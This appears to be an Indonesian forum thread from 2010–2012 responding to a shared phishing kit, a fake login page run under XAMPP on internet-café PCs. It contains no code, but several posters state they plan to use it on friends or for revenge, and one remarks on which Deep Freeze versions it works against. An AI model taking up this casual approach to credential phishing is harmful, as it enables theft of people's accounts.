kirain hack kaya gmna, taunya sejenis tipe Phising. jadi inget bikin site phising dulu waktu jaman FS. :hehe:

TqT
11-12-2010, 11:48 AM
linknya ko ga jalan seh om
Link yang mana gan? :???:

kirain hack kaya gmna, taunya sejenis tipe Phising. jadi inget bikin site phising dulu waktu jaman FS. :hehe:
Iya gan :haha:

apollojustice
25-12-2010, 02:50 AM
ade2 aje ente gan

TqT
28-12-2010, 11:13 PM
ade2 aje ente gan
:malu1:

wah bahaya neh gan..

kasian klo orang awam gan hehe

jika berkenan mampir ke lapak ane gan

http://www.indowebster.web.id/showthread.php?t=133309

lumayan bwt nambah uang receh

makanya gunakan dengan bertanggung jawab :awas:

walah malah promosi thread :swt:

eongravity11
29-12-2010, 01:00 AM
fake login ya gan?

mau nyoba" dulu..

berapa kali coba ga jadi" =.=a

tamaguci
29-12-2010, 01:08 PM
kalau warnet nya da deep freezer bagaimana???

inish
29-12-2010, 04:01 PM
nambah ilmu satu lagi....:yahoo:

tapi jangan sering2 dilakuin:swt:nanti kalo ketahuan:jotos temen:dead:

momo
03-01-2011, 12:16 PM
link unduh yg di depan udah ga bisa tuh :hot:
edit:
eh udah bisa skrng :peace:
*ternyata ga di klik lsng :boong:

FaytLeingod
04-01-2011, 08:01 PM
asikkk skrg bisa nyoba-nyoba jadi hacker :niceinfo: gan

Gumarapus
05-01-2011, 03:34 PM
masih valid ga ini gan ??? setau aq udah ga bisa lagi deh

adhyec009
01-03-2011, 11:52 AM
gimana cara makenya ni XAMPP, mohon bantuanyya kk.............

Hakimania
04-03-2011, 11:39 PM
coba dulu ah...
sekalian nyari korban pertama
wkwkkwkwk

Ahong
04-03-2011, 11:58 PM
Trik Phising msh laku juga toh...

lumberjack22
05-03-2011, 12:45 AM
mainnya di localhost ini ya

badoong
01-08-2011, 11:52 AM
rda2 rmit cranya

shaaa
01-08-2011, 12:57 PM
O0o, jd sejenis phising gt ?

McCoffe
01-08-2011, 01:29 PM
lumayan buat coba2 ngehack temen gw...makasih gan da dicariin

devil_never_cry
01-08-2011, 11:00 PM
ini maksudnya phising klo temen kita pake compi kita y?? :bloon:

dayoun
02-08-2011, 02:16 AM
Kreatif banget sih saudara kita TqT (http://www.indowebster.web.id/member.php?u=45479) satu ini.
Ane pake xampp 1.7.3 bisa kan???:hihi:

Symphony_Roads
02-08-2011, 03:14 AM
pek lokgin :dead:

udah lama maen ginian :dead:

cuman bisa di sebar di warnet yg deepfreeze nya versi 7 kebawah :dead:

kopat
11-08-2011, 11:31 AM
waktu gua coba g bisa jalan nih, knp y?

vladamir
07-10-2011, 04:33 PM
ah gue pernah dikirimi beginian tapi ga bakal ketipu wkakaka

geslspf
24-12-2011, 06:53 PM
wah link downloadnya dead semua tuh .. :kecewa:

silverkhingz
24-12-2011, 07:00 PM
^: link-nya tidak dead (setidaknya saat saya post ini masih ada)
Hanya saja TS nya sebenarnya pakai tag [url] ke adfly , jadinya di postingan memang terlihat langsung link ziddu tapi kalau di klik sebenarnya redirect ke adfly dulu baru ke ziddu, sementara link adfly di sini di blokir.
Sudah saya edit, dan saya cek masih eksis file nya.
Thanks

geslspf
24-12-2011, 07:09 PM
pantes saja tadi gak bisa, soalnya bintangnya ane ganti ziddu, bukan adfly... :top:

kimun
14-01-2012, 09:33 PM
semacam phising ya gan?

geslspf
18-01-2012, 08:28 PM
nih fb temen saya di hack orang, update status yang bikin kesal,
masalanya belom bisa ngatasin, adakah yang bisa bantu :???:

udah nyoba ini, tapi masih belom terlalu faham saya script"nya..

antosuryanto
22-01-2012, 05:23 PM
Ini maksudnya buat ngejebak temen ya? jadi bukan mengetahui langsung semua password temen2 kita?:bloon:

rivanol
23-01-2012, 01:29 AM
gw pernah kna nih yg kya bginian, kg tau pke ini apa kga, bisa buat balas dendam nih
.ha

tomiero
23-01-2012, 08:25 AM
closed http://www.indowebster.web.id/showthread.php?t=45384&p=14522563&viewfull=1#post14522563 :)